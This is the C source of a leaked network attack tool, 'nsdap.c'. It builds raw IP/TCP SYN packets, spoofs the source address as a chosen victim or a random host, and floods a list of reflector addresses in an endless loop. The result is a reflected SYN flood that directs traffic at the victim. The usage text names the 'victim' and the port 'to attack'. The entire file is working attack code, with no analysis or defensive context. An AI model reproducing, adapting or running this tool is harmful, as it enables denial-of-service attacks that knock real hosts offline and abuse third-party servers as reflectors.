nsdap.c

1. //leaked by storm@efnet
2. //nsdap.c
3.  
4. #include <netinet/tcp.h>
5. #include <stdio.h>
6. #include <unistd.h>
7. #include <stdlib.h>
8. #include <sys/types.h>
9. #include <sys/socket.h>
10. #include <netinet/in.h>
11. #include <netdb.h>
12. #include <signal.h>
13. #include <string.h>
14.  
15. #define ENDIAN_LITTLE
16. #define IPLISTSIZE 15000
17. #define TH_SYN     0x02
18.  
19. int rawsock = 0;
20. unsigned int start;
21. unsigned int packets = 0;
22. unsigned short databytes = 0;
23. unsigned long ip_list[IPLISTSIZE];
24. FILE *ipfile = NULL;
25.  
26. unsigned short
27. csum (unsigned short *addr, int len)
28. {
29.   int nleft = len;
30.   unsigned int sum = 0;
31.   unsigned short *w = addr;
32.   unsigned short answer = 0;
33.  
34.   while (nleft > 1)
35.     {
36.       sum += *w++;
37.       nleft -= 2;
38.     }
39.   if (nleft == 1)
40.     {
41.       *(unsigned char *) (&answer) = *(unsigned char *) w;
42.       sum += answer;
43.     }
44.   sum = (sum >> 16) + (sum & 0xffff);
45.   sum += (sum >> 16);
46.   answer = ~sum;
47.   return (answer);
48. }
49.  
50. struct tcphdr2
51. {
52.   unsigned short th_sport;  /* source port */
53.   unsigned short th_dport;  /* destination port */
54.   unsigned int th_seq;      /* sequence number */
55.   unsigned int th_ack;      /* acknowledgement number */
56.   unsigned char th_x2:4;    /* (unused) */
57.   unsigned char th_off:4;   /* data offset */
58.   unsigned char th_flags;
59.   unsigned short th_win;    /* window */
60.   unsigned short th_sum;    /* checksum */
61.   unsigned short th_urp;    /* urgent pointer */
62. };
63.  
64. struct ip
65. {
66. #ifdef ENDIAN_LITTLE
67.   unsigned int ip_hl:4;     /* header length */
68.   unsigned int ip_v:4;      /* version */
69. #else
70.   unsigned int ip_v:4;      /* version */
71.   unsigned int ip_hl:4;     /* header length */
72. #endif
73.   unsigned char ip_tos;     /* type of service */
74.   unsigned short ip_len;    /* total length */
75.   unsigned short ip_id;     /* identification */
76.   unsigned short ip_off;    /* fragment offset field */
77. #define IP_RF 0x8000        /* reserved fragment flag */
78. #define IP_DF 0x4000        /* dont fragment flag */
79. #define IP_MF 0x2000        /* more fragments flag */
80. #define IP_OFFMASK 0x1fff   /* mask for fragmenting bits */
81.   unsigned char ip_ttl;     /* time to live */
82.   unsigned char ip_p;       /* protocol */
83.   unsigned short ip_sum;    /* checksum */
84.   struct in_addr ip_src, ip_dst;    /* source and dest address */
85. };
86.  
87. struct ph
88. {               /* rfc 793 tcp pseudo-header */
89.   unsigned long saddr, daddr;
90.   char mbz;
91.   char ptcl;
92.   unsigned short tcpl;
93. };
94.  
95. struct tcp_opthdr
96. {
97.   unsigned char op0;
98.   unsigned char op1;
99.   unsigned char op2;
100.   unsigned char op3;
101.   unsigned char op4;
102.   unsigned char op5;
103.   unsigned char op6;
104.   unsigned char op7;
105. /* we only need this if we use window scaling and timestamps */
106.   unsigned char op8;
107.   unsigned char op9;
108.   unsigned char op10;
109.   unsigned char op11;
110.   unsigned char op12;
111.   unsigned char op13;
112.   unsigned char op14;
113.   unsigned char op15;
114.   unsigned char op16;
115.   unsigned char op17;
116.   unsigned char op18;
117.   unsigned char op19;
118. };
119.  
120. struct
121. {
122.   char buf[1551];       /* 64 kbytes for the packet */
123.   char ph[1551];        /* 64 bytes for the paeudo header packet */
124. } tcpbuf;
125.  
126. unsigned int
127. lookup (char *hostname)
128. {
129.   struct hostent *name;
130.   unsigned int address;
131.  
132.   if ((address = inet_addr (hostname)) != -1)
133.     return address;
134.   if ((name = gethostbyname (hostname)) == NULL)
135.     return -1;
136.  
137.   memcpy (&address, name->h_addr, name->h_length);
138.   return address;
139. }
140.  
141. void
142. handle_exit ()
143. {
144.   printf ("Flood completed, %d packets sent, %d seconds, %d packets/sec\n",
145.       packets, time (NULL) - start, packets / (time (NULL) - start));
146.   exit (0);
147. }
148.  
149. void read_list(void)
150. {
151.     int x=0;
152.     int errcount=0;
153.  
154.     if (ipfile == NULL)
155.     {
156.         if ( (ipfile=fopen("list","r")) == NULL)
157.         {
158.             fprintf(stderr, "Can't open ip file\n");
159.             exit(0x0);
160.         }
161.     }
162.  
163.     while (x <= IPLISTSIZE-1)
164.     {
165.         char buf[32];
166.         char *nl=NULL;
167.         int bc = 0;
168.         memset(&buf,0,32);
169.         while (fgets(buf, 32, ipfile) == NULL)
170.         {
171.             rewind(ipfile);
172.             errcount++;
173.             if (errcount > 32)
174.             {
175.                 fprintf(stderr, "Couldn't read from IP list\n");
176.                 exit(0);
177.             }
178.         }
179.         errcount = 0;
180.         bc = strlen(buf);
181.         while (buf[bc-1] == '\r' || buf[bc-1] == '\n') // chop off CRLF
182.             buf[bc-1] = 0;
183.  
184.         ip_list[x] = inet_addr(buf);
185.         x++;
186.     }
187. }
188.  
189. void
190. attack (unsigned int srcip, unsigned short dstport,
191.     unsigned short srcport)
192. {
193.   struct sockaddr_in sin;
194.   int x, something=0;
195.   unsigned long y = 0UL;
196.   FILE *ipfile;
197.   char *xptr, buf[200];
198.   struct ip *xf_iphdr = (struct ip *) tcpbuf.buf;
199.   struct tcphdr2 *xf_tcphdr =
200.     (struct tcphdr2 *) (tcpbuf.buf + sizeof (struct ip));
201.   struct tcp_opthdr *xf_tcpopt =
202.     (struct tcp_opthdr *) (tcpbuf.buf + sizeof (struct ip) +
203.                sizeof (struct tcphdr2));
204.  
205. /* for the pseudo header */
206.   struct ph *ps_iphdr = (struct ph *) tcpbuf.ph;
207.   struct tcphdr2 *ps_tcphdr =
208.     (struct tcphdr2 *) (tcpbuf.ph + sizeof (struct ph));
209.   struct tcp_opthdr *ps_tcpopt =
210.     (struct tcp_opthdr *) (tcpbuf.ph + sizeof (struct ph) +
211.                sizeof (struct tcphdr2));
212.  
213. /* fill the packets with random data */
214. /*  for (x = 0; x <= sizeof (tcpbuf.buf); x++)
215.     {
216.       tcpbuf.buf[x] = random ();
217.     } */
218. /* duplicate */
219.   memcpy (tcpbuf.ph, tcpbuf.buf, sizeof (tcpbuf.ph));
220.  
221.  
222.   xf_iphdr->ip_v = 4;
223.   xf_iphdr->ip_hl = 5;
224.   xf_iphdr->ip_tos = 0;
225.  
226. #ifdef MACOS
227.   xf_iphdr->ip_len =
228.     sizeof (struct ip) + sizeof (struct tcphdr2) + sizeof (struct tcp_opthdr);
229.   xf_iphdr->ip_off = 0x4000;
230. #else
231.   xf_iphdr->ip_len =
232.     htons (sizeof (struct ip) + sizeof (struct tcphdr2) +
233.        sizeof (struct tcp_opthdr));
234.   xf_iphdr->ip_off = htons (0x4000);
235. #endif
236.   xf_iphdr->ip_id = htons (random ());  /* random IP id */
237.  
238.   xf_iphdr->ip_ttl = 65535;
239.   xf_iphdr->ip_p = IPPROTO_TCP;
240.  
241.   xf_tcphdr->th_seq = htonl (rand ());
242.  
243.   xf_tcphdr->th_off =
244.     (sizeof (struct tcphdr2) + sizeof (struct tcp_opthdr)) / 4;
245.   xf_tcphdr->th_ack = (random ());
246.  
247. /* large windows are more evil */
248.   xf_tcphdr->th_win = 64240;
249.   xf_tcphdr->th_urp = 0;
250.  
251. /* set the flags */
252.   xf_tcphdr->th_flags = 0x02;
253.  
254. /* source ip */
255.   xf_iphdr->ip_src.s_addr = srcip;
256.  
257. /* option headers */
258. /* mss */
259.   xf_tcpopt->op0 = 2;
260.   xf_tcpopt->op1 = 4;
261.   xf_tcpopt->op2 = 6;
262.   xf_tcpopt->op3 = 0xb4;
263.  
264. /* sackok */
265.   xf_tcpopt->op4 = 4;
266.   xf_tcpopt->op5 = 2;
267.  
268. /* timestamp */
269.   xf_tcpopt->op6 = 8;
270.   xf_tcpopt->op7 = 0x0a;
271.   xf_tcpopt->op8 = 0xb2;
272.   xf_tcpopt->op9 = 8;
273.   xf_tcpopt->op10 = 0xf0;
274.   xf_tcpopt->op11 = 0x47;
275.  
276.   xf_tcpopt->op12 = 0;
277.   xf_tcpopt->op13 = 0;
278.   xf_tcpopt->op14 = 0;
279.   xf_tcpopt->op15 = 0;
280. /* nop */
281.   xf_tcpopt->op16 = 0x01;
282. /* window scaling */
283.   xf_tcpopt->op17 = 0x03;
284.   xf_tcpopt->op18 = 0x03;
285.   xf_tcpopt->op19 = 0x04;
286.  
287.  
288. /* *** Pseudo Header *** */
289.   ps_iphdr->mbz = 0;
290.   ps_iphdr->ptcl = IPPROTO_TCP;
291.   ps_iphdr->saddr = xf_iphdr->ip_src.s_addr;
292.   ps_iphdr->tcpl =
293.     htons (sizeof (struct tcphdr2) + sizeof (struct tcp_opthdr) + databytes);
294.  
295.   memcpy (ps_tcphdr, xf_tcphdr, sizeof (struct tcphdr2));
296.   memcpy (ps_tcpopt, xf_tcpopt, sizeof (struct tcp_opthdr));
297.  
298.   xf_tcphdr->th_sport = htons (srcport);
299.   xf_tcphdr->th_dport = htons (dstport);
300.  
301.   ps_tcphdr->th_sport = htons (srcport);
302.   ps_tcphdr->th_dport = htons (dstport);
303.  
304.   read_list();
305.  
306.   printf ("Sending packets of size %d....\n",
307.       sizeof (struct ph) + sizeof (struct tcphdr2) +
308.       sizeof (struct tcp_opthdr) + databytes);
309.  
310.   y = 0UL;
311.   for (;;)
312.     {
313.         ps_iphdr->daddr = ip_list[y];
314.         xf_iphdr->ip_dst.s_addr = ip_list[y];
315.  
316.  
317.       if (dstport == 0)
318.     {           /* random dest ports */
319.       xf_tcphdr->th_dport = random ();
320.       ps_tcphdr->th_dport = xf_tcphdr->th_dport;
321.     }
322.       if (srcport == 0)
323.     {
324.       xf_tcphdr->th_sport = random ();
325.       ps_tcphdr->th_sport = xf_tcphdr->th_sport;
326.     }
327.  
328.       if (srcip == 0)
329.     {           /* random source */
330.       xf_iphdr->ip_src.s_addr = rand ();
331.       ps_iphdr->saddr = xf_iphdr->ip_src.s_addr;
332.     }
333.  
334.  
335. /* we could do this globally too */
336.       sin.sin_family = AF_INET;
337.       sin.sin_port = xf_tcphdr->th_dport;
338.       sin.sin_addr.s_addr = ps_iphdr->daddr;
339.  
340.  
341. /* calculate tcp checksum */
342.       xf_tcphdr->th_sum = 0;
343.       xf_tcphdr->th_sum =
344.     csum ((unsigned short *) tcpbuf.ph,
345.           sizeof (struct ph) + sizeof (struct tcphdr2) +
346.           sizeof (struct tcp_opthdr) + databytes);
347.  
348. /* send */
349. //printf ("Sending packet size %d %d\n", sizeof (struct ip) + sizeof (struct tcphdr2) + sizeof (struct tcp_opthdr) + databytes, ps_iphdr->tcpl);
350. //sleep(1);
351.       sendto (rawsock, tcpbuf.buf,
352.           sizeof (struct ip) + sizeof (struct tcphdr2) +
353.           sizeof (struct tcp_opthdr) + databytes, 0,
354.           (struct sockaddr *) &sin, sizeof (sin));
355.       packets++;
356.  
357.       y++;
358.       if (y > IPLISTSIZE-1 || ip_list[y] == 0)
359.       {
360.           y = 0UL;
361.           read_list();
362.       }
363.     }
364.  
365. }
366.  
367. main (int argc, char **argv)
368. {
369.   char list[30];
370.   unsigned int srcip;
371.   unsigned short dstport, srcport;
372.   unsigned long x = 0UL;
373.   int hincl = 1;
374.  
375. /* parse arguments */
376.   if (argc < 5)
377.     {
378.       printf ("usage : %s dest list destport srcport [size]\n\n",
379.           argv[0]);
380.       printf ("dest       = the victim ip/host\n");
381.       printf ("src        = ip to spoof the attack as\n");
382.       printf ("destport   = port to attack on the victim\n");
383.       printf ("srcport    = port which the packets will come from\n");
384.       printf ("size       = tcp packet size (not inc header)\n");
385.  
386.       exit (0);
387.     }
388.  
389. /* allocate socket */
390.   rawsock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW);
391.   if (rawsock <= 0)
392.     {
393.       printf ("Error opening raw socket\n");
394.       exit (-1);
395.     }
396.  
397.      setsockopt(rawsock, IPPROTO_IP, IP_HDRINCL, &hincl, sizeof(hincl));
398.  
399.  
400.   srcip = lookup (argv[1]);
401.   if (srcip <= 0)
402.     {
403.       printf ("Cant resolve source address\n");
404.     }
405.  
406.       databytes = 0;
407.   dstport = atoi (argv[3]);
408.   srcport = atoi (argv[4]);
409.  
410.   for (x=0; x < IPLISTSIZE; x++)
411.     ip_list[x] = 0;
412.  
413.   signal (SIGINT, handle_exit);
414.   signal (SIGTERM, handle_exit);
415.   signal (SIGQUIT, handle_exit);
416.   start = time (NULL);
417.   attack (srcip, dstport, srcport);
418.  
419. }